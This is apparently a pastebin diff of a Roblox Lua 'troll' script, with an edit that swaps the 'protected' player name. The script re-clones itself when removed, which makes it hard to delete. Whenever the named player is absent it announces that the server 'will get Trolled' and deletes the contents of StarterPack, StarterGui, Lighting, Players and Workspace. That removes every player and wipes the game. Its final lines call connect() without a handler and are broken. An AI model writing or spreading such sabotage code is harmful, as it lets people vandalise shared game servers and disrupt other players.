SHOW:
|
|
- or go back to the newest paste.
| 1 | local Settings={["Un_Removable"]= "On"}
| |
| 2 | local function mFloor(x) return x - x % 1 end | |
| 3 | local Un_Removable = tostring(Settings["Un_Removable"]):lower() == "on" | |
| 4 | if Un_Removable then | |
| 5 | Game.Workspace.DescendantRemoving:connect(function(Child) | |
| 6 | if not Remove_At_Will and Child == script then | |
| 7 | script:Clone().Parent = Game.Workspace | |
| 8 | end | |
| 9 | end) | |
| 10 | end | |
| 11 | ||
| 12 | ||
| 13 | c = Instance.new("Hint")
| |
| 14 | c.Text = "GET, REKT!" -- Enter your message -- | |
| 15 | c.Parent = game.Workspace | |
| 16 | while true do | |
| 17 | wait(0.1) | |
| 18 | - | if not game.Players:findFirstChild("dardo99") then -- You need put here the protected name --
|
| 18 | + | if not game.Players:findFirstChild("CommanderWix") then -- You need put here the protected name --
|
| 19 | e=Instance.new("Message")
| |
| 20 | e.Parent=game.Workspace | |
| 21 | - | e.Text = "dardo99 has been kicked or banned. The server will get Trolled'" -- Enter your message -- |
| 21 | + | e.Text = "He has been kicked or banned. The server will get Trolled'" -- Enter your message -- |
| 22 | wait(5) | |
| 23 | e.Parent = game.Workspace | |
| 24 | a = game.StarterPack:getChildren() | |
| 25 | for i = 1,#a do | |
| 26 | a[i]:remove() | |
| 27 | end | |
| 28 | b = game.StarterGui:getChildren() | |
| 29 | for i = 1,#b do | |
| 30 | b[i]:remove() | |
| 31 | end | |
| 32 | c = game.Lighting:getChildren() | |
| 33 | for i = 1,#c do | |
| 34 | c[i]:remove() | |
| 35 | end | |
| 36 | h = game.Players:getChildren() | |
| 37 | for i = 1,#h do | |
| 38 | h[i]:remove() | |
| 39 | end | |
| 40 | j = game.Workspace:getChildren() | |
| 41 | for i = 1, #j do | |
| 42 | j[i]:remove() | |
| 43 | end | |
| 44 | end | |
| 45 | end | |
| 46 | ||
| 47 | Game.JointsService.DescendantAdded:connect() | |
| 48 | Workspace.DescendantAdded:connect() |